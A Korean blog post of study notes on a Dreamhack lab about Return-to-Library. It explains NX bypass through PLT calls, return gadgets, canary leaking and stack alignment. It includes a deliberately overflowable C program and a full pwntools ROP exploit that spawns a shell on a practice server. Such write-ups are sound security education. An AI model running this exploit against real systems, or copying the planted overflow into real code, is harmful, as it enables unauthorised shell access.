Exploit Tech: Return to Library

🌇│System_Study/📕│Dreamhack_Hacking

Exploit Tech: Return to Library

Jastes 2022. 6. 13. 17:55

Return To Library

NX로 인해 공격자가 버퍼에 주입한 셸 코드를 실행하기는 어려워졌지만, 어전히 BOF는 가능!
그래서 공격자들은 실행 권한이 남아있는 코드 영역으로 반환 주소를 덮는 공격 기법을 고안했죠

프로세스에 실행 권한이 있는 메모리 영역은 일반적으로 바이너리의 코드 영역 & 참조 lib의 코드 영역

특히 공격자들이 주목한 것은 다양한 함수가 구현된 라이브러리입니다.
몇몇 lib는 공격에 유용한 함수들이 구현되어 있습니다
예로 리눅스에 C로 작성된 프로그램 참조한 libc에 system/execve 등 프로세스 실행 관련 함수들이 구현됨

Return To Libc(Return To Library)

libc의 함수들로 libc의 함수들 NX를 우회하고 셸을 획득하는 공격 기법을 개발
좀 더 범용적으로 다른 lib도 공격에 활용되면 Return To Library라 부름

유사한 공격 기법으로 Return To PLT가 있는데 이 공격 기법도 lib의 코드를 사용하는 것이 핵심으로,
이 부분은 RTL의 하위버전으로 봐야겠죠 아래 코드는 우리가 뚫어버릴 코드

Checksec으로 간단하게 어떤 상태인지 확인해봅시다

NX와 Canary 그리고 ASLR은 최신 그리고 실습 환경에선 특별한 말 없으면 기본
즉, 3개의 보호기법이 껍쳐있네요.. 힘들겠지만 RTL의 공격기법을 활용하면 EZ(..?)

BOF의 취약점(Canary 우회까진)은 이전이랑 유사하니 넘기고 혹시 모르면 아래로

Exploit Tech: Return to Shellcode

dystopia050119.tistory.com

'/bin/sh'를 코드 섹션에 추가

rlt.c의 7번째 줄은 '/bin/sh'를 코드 섹션에 추가하기 위해 작성된 코드입니다.
ASLR이 적용돼도 PIE가 적용되지 않으면 코드/데이터 세그먼트의 주소는 고정되므로.. 고정되죠
이 문자열(상수?)는 공격에 매우 유용하게 사용될 수 있겠죠

system 함수를 PLT에 추가

rtl.c의 16번째 줄은 PLT에 system을 추가하기 위해 작성된 코드입니다. 이전에 배운 내용이죠?
그 중 PLT에는 함수의 주소가 resolve되지 않을 시, 함수의 주소를 구하고 실행하는 코드가 있어요

따라서 PLT에 어떤 lib 함수가 등록되어 있다면, 그 함수의 PLT 엔트리를 실행함으로써 실행 가능

공격기법 : Return PLT

ASLR이 걸려 있어도 PIE가 적용되어 있지 않다면 PLT의 주소는 고정되므로, 무작위의 주소에 매핑되는 lib의 베이스 주소를 몰라도 이 방법으로 lib 함수를 실행 할 수 있습니다

라이브러리의 베이스 주소를 구하여 ASLR를 우회는 나중에..
이번엔 PLT를 이용한 NX 우회에 대하여 해봅시다.

ELF의 PLT에는 ELF가 실행하는 lib 함수만 포함되어, 다음 코드를 작성 system 함수 추가합시다.

// Name: rtl.c
// Compile: gcc -o rtl rtl.c -fno-PIE -no-pie
 
#include <stdio.h>
#include <unistd.h>
 
const char* binsh = "/bin/sh";
 
int main() {
  char buf[0x30];
 
  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);
 
  // Add system function to plt's entry
  system("echo 'system@plt");
 
  // Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);
 
  // Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);
 
  return 0;
}

rtl.c

0.00MB

직접 컴파일해도 되고 아님 실행 파일만 갖고 쓰셔도 상관 없어요 어짜피 dreamhack문제니..

버퍼 오버플로우

rtl.c의 18번째 27번은 이전부터 계속 한 ASLR를 우회하기 위한 BOF를 2번 발생해하는..
이전까지 버퍼 오버플로우로 카나리를 우회하는 방법 등을 배웠으니 여긴 설명 패스

Mitigation: Stack Canary

스택 카나리(Stack Canary) 스택 버퍼 오버플로우로부터 반환 주소를 보호하는 기법 함수의 프롤로그에서 스택 버퍼와 반환 주소 사이에 임의의 값을 삽입하고, 함수의 에필로그에서 해당 값의 변

dystopia050119.tistory.com

Exploit Tech: Return to Shellcode

dystopia050119.tistory.com

Exploit 설계

1. 카나리 우회

이전 위에 두 링크에서 배운 내용이니 참고하실거면 위에 링크 따라서 가시면 됩니다.

2. rdi값을 "/bin/sh"의 주소로 설정 및 셸 획득

카나리를 구했으면, 이제 두 번째 입력으로 RET를 덮을 수 있죠
그러나 NX로 인해 지난번처럼 쉽게는 안된다는 점 다른 방법으로 접근해야겠죠

공격을 위해 알고 있는 정보를 정리해봅시다

"/bin/sh"의 주소를 안다
system 함수의 PLT 주소를 앎 → system 함수 호출 가능

위에 링크 Return..를 보면 system("/bin/sh")을 호출하면 셸을 획득할 수 있습니다.
x84-64의 호출 규약에 따르면 이는 rdi="/bin/sh" 주소인 상태에서 system 함수를 호출한 것과 같습니다

이 예제는 "/bin/sh"의 주소를 알고, system 함수를 호출할 수 있으므로...
"bin/sh"의 주소를 rdi의 값으로 설정할 수 있다면 system("/bin/sh")를 실행할 수 있습니다
이를 위해선 리턴 가젯을 활용해야하고요

리턴 가젯(Return gadget)

다음과 같이 ret로 끝나는 어셈블리 코드 조각을 의미

이전까진 코드에서는 어떤 함수의 주소 또는 셸 코드 주소로 반환 주소를 덮어서 한번에 셸 획득!
그러나 NX로 인해 셸 코드를 실행할 수 없는 상황에선, 단 한 번의 함수 실행으로 셸 획득은 일반적으론 불가능ㅠ

리턴 가젯은 반환 주소를 덮는 공격의 유연성을 높여서 익스플로잇에 필요 환경 조건에 만족하게 돕습니다
예로 이 예제엔 rdi의 값을 "/bin/sh"의 주소로 설정하고, system 함수를 호출해야 합니다

리턴 가젯을 사용해 반환 주소와 이후 버퍼를 다음과 같이 덮으면,
pop rdi로 rdi를 "/bin/sh"의 주소로 설정하고, 이어지는 ret로 system 함수를 호출할 수 있습니다

대부분 함수는 ret로 종료되므로, 함수들도 리턴 가젯으로 사용될 수 있습니다
리턴 가젯을 사용한 더욱 복잡한 공격은 나중에 같이 볼께요

카나리를 우회하고, system("/bin/sh")를 호출할 계획을 세웠으므로 이를 코드로 구현합시다

Exploit

카나리 우회하는 과정은 지난번에 했으므로 간단하게 짜보면...

...15번부터 보면 되겠네요 위에는 기본적인 설정 혹은 취향차이니까요
그 전에 코드는 buf가 0x30인데 왜 0x39를 했을까..? 의구심이 돋죠?

근데 확인해보면 rsp는 0x40으로 잡혀있단 말이죠.. 그 이유를 알아보자면 먼저 buf가 0x30이며,
Canary는 지금 아키텍처가 x64이기에 8byte가 할당되어 있죠.. 자 근데 그 전에 stack alignment에 의해
현제 16씩 patch된다고 그 전에도 그랬죠 그러므로 0x30 + 0x8(Canary)를 하면 16씩 안되죠

그래서 8byte를 추가한거예요 그런데 문자열은 끝에 null byte로 구분 또한 카나리는 앵간하면
'\x00'으로 시작하므로 +1byte를 추가해 버퍼를 채워 BOF.. 사실 0x30만 초과해도 되지만
우린 Leak Canary값을 구하는 거니까 맞춰서 해야겠죠? 그래서 buf와 sfp의 offset을 구해봐야해요

아.. 그리고 그 전엔 unpacking해도 상관 없었는데 여기선 해야 오류가 안나더군요..
그러시면 이럴 수 있어요 뭐야 Dreamhack이 제시한거랑 똑같네.. 이러시면 네.. 참고 많이 했어요

하지만 제가 잘못 이해했거나 후에 알아도 수정하기 귀찮아서 안 할때를 대비해.. 링크 히히

buf의 크기가 0x30인데 익스플로잇 코드에 buf공간을 채울때 0x38만큼 채우는 이유가 궁금합니다.

최종 익스플로잇 코드를 보면 buf공간을 채우기 위해 b'A'같은 문자를 0x38개 만큼 넣습니다. 근데 소스코드에 있는 buf의 크기는 분명 0x30인데 말이죠. 분명 예전에 이…

dreamhack.io

리턴 가젯 찾기

리턴 가젯을 찾는 방법은 다양하지만, 일반적으로 ROPgadget을 사용합니다.
pypi를 이용해.. 즉, 파이썬 모듈이죠

이왕하는 겸 pip 업데이트도 같이 해주세요 뭐 Warning이건 무시하셔도 별 문제 없어보이고요
다음 명령어로 잘 설치 했는지도 확인할 수 있습니다.

다음 명령어로 필요한 가젯도 찾고, 음.. 필요한 게 ret(system)/rdi("/bin/sh")겠죠?
--re 옵션을 사용하면 정규표현식으로 가젯 필터링 가능(추천.. 너무 많으니까)

여기서 또 의문이 들 수 있어요
"아니 저 0x400285가 system 함수 ret인지 어떻게 아냐!!"라고요

간단하죠 저거 보시면 다 외부 참조형식이니까 저거 밖에 없을거예요
아까 함수도 종결 거의 다 저걸로 한다고 했으니까 저렇게 레지스터 끼고 오는거 빼면.. ㅇ

또 뭐.. 왜 ret를 구해야 하나? 라고 생각이 든다면

이 익스플로잇에서 가젯 위에 추가된 ret 가 궁금합니다.

22번 줄과 25번 줄 코드와 함께 # align stack to prevent errors caused by movaps라는 주석이 표시되었는데, 왜 이 코드가 사용되는 이유를…

dreamhack.io

아례 링크는 상세하게 pwndbg를 활용해 들어가는 부분인데.. 음.. 전 여기까진
하는 건 힘들기에 같이 봅시다 ㅎ

ret2libc - x64 && (MOVAPS issue 삽질)

ret2libc-x64 RTL(return-to-libc) RTL이란 Return address 영역에 공유 라이브러리 함수의 주소로 변경해, 해당 함수를 호출하는 방식 NX-Bit(DEP) 우회 가능 Calling Convention System V AMD64 ABI Solaris, Li..

c0wb3ll.tistory.com

익스플로잇

앞에서 말했드시 다음과 같이 가젯을 구성하면 system("/bin/sh")를 실행할 수 있죠

"/bin/sh"의 주소를 다음 pwndbg의 명령어로도 찾을 수 있어요

system 함수의 PLT의 주소를 pwndbg나 pwntools에 대하여 알 수 있습니다.

우리는 pwntools로 알아봅시다. 자세한건 이전에 정리한 자료 여기로

가젯으로 구성된 페이로드를 작성하고, 이 페이로드로 반환 주소를 덮으면 셸을 획득 가능

근데 한가지 주의할 점은 system 함수로 rip가 이동할 때, 스택은 반드시 0x10단위로 정렬..해야한다
이는 system 함수 내부에 있는 movaps 명령어 때문에 스택이 0x10단위로 정렬되야 에러 없이 실행 되요
참고로 system 함수(SetUID의 함수..?)이니까 NX를 우회 할 수 있는거예요

그럼 대체 저걸 알아서 어디다가 쓰냐.. 아무래도 우린 system 함수의 인자부분을 건들어서 넣는다보니까
스택에 어떤 값을 얼마나 넣고 안넣고는 중요하지 않고 rsp레지스터의 값을 바꿔주는게 중요한데요.
ret은 pop rip; jmp rip와 같은 역할입니다. 그래서 0x8만큼 증가되니까..
결국 스택이 정렬되어야 한다는 뜻이 rsp레지스터의 값이 0x10의 배수로 정렬되어야 한다는 뜻

그러므로 system 함수를 이용한 exploit을 작성 시, 잘 작성해도 Segmentation Fault 발생 시
system 함수의 가젯을 8byte 뒤로 미뤄보는 것도 좋아요 이를 위해 no-op gadget을 넣어보는 것!

밑에 링크는 뭐 문제해결에 큰 도움이 될 거 같진 않지만(전 어짜피 답보면서 분석해서..)
위에 해석에 있어서 도움이 되어 올려보았습니다.

0x10 정렬 관련 질문이 있습니다!

0x10 의 배수만큼 스택을 정렬해줘야 오류를 면할 수 있다고 하여 아무 의미 없는 바이트를 추가하기 위해 \x90과 같은 NOP 바이트를 더미로 추가해보았습니다. 그렇지만 \x9…

dreamhack.io

익스플로잇 코드는 위에 학습한 내용 그대로 했는데...
더 자세히 더 정확하게.. 나중에 할 문제에서 집어서 할께요 ㅠ

#/!/usr/python3
from pwn import *
 
#p = process('./rtl')
p = remote('host2.dreamhack.games', 16030)
context(arch='amd64', os='linux')
context.log_level = 'debug'
e = ELF('./rtl')
 
#gdb disassemble runtime excute & checking
#gdb.attach('./rtl')
 
def slog(name, addr): return success(':'.join([str(name), hex(addr)]))
 
#[1] Leak canary
buf = b'A' * 0x39
cnry = ''
 
p.sendafter('Buf: ', buf)
p.recvuntil(buf)
cnry = u64(b'\x00'+p.recvn(7))
slog('Address Canary', cnry)
 
# [2] exploit
system_plt = e.plt['system']
binsh = 0x400874
pop_rdi = 0x400853
ret = 0x400285
 
#payload
payload = b'A'*0x38 + p64(cnry) + b'B'*0x8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system_plt)
 
#pause()
p.sendafter("Buf: ", payload)
 
p.interactive()

마무리

NX를 우회하는 RTL 공격 기법에 대하여 알아보았습니다.
RTL 공격 기법 이후 chaining RTL, 그리고 Return Oriented Programming(ROP)로 발전됨
여기서 핵심은 리턴 가젯이겠죠 여기선 익스플로잇에 바이너리의 가젯만 사용했으나,
libc의 베이스 주소를 안다면 libc의 가젯들도마찬가지의 방법으로 사용할 수 있어,

lib엔 매우 많은 가젯이 포함되어 있으니 활용하면
어셈블리어로 프로그래밍하는 것과 유사한 효과를 얻을 수 있겠죠

그래서 이름 붙여진 것이 Return Oriented Programming(ROP)!!

참고 자료

Exploit Tech: Return to Library

이번 코스에서는 카나리를 우회하고, 라이브러리의 코드를 이용하는 공격 기법을 실습합니다.

dreamhack.io

Return to Library

Description Exploit Tech: Return to Library에서 실습하는 문제입니다.

dreamhack.io

0x10 정렬 관련 질문이 있습니다!

dreamhack.io

이 익스플로잇에서 가젯 위에 추가된 ret 가 궁금합니다.

22번 줄과 25번 줄 코드와 함께 # align stack to prevent errors caused by movaps라는 주석이 표시되었는데, 왜 이 코드가 사용되는 이유를…

dreamhack.io

buf의 크기가 0x30인데 익스플로잇 코드에 buf공간을 채울때 0x38만큼 채우는 이유가 궁금합니다.

dreamhack.io

참고 이미지

저작자표시 비영리 변경금지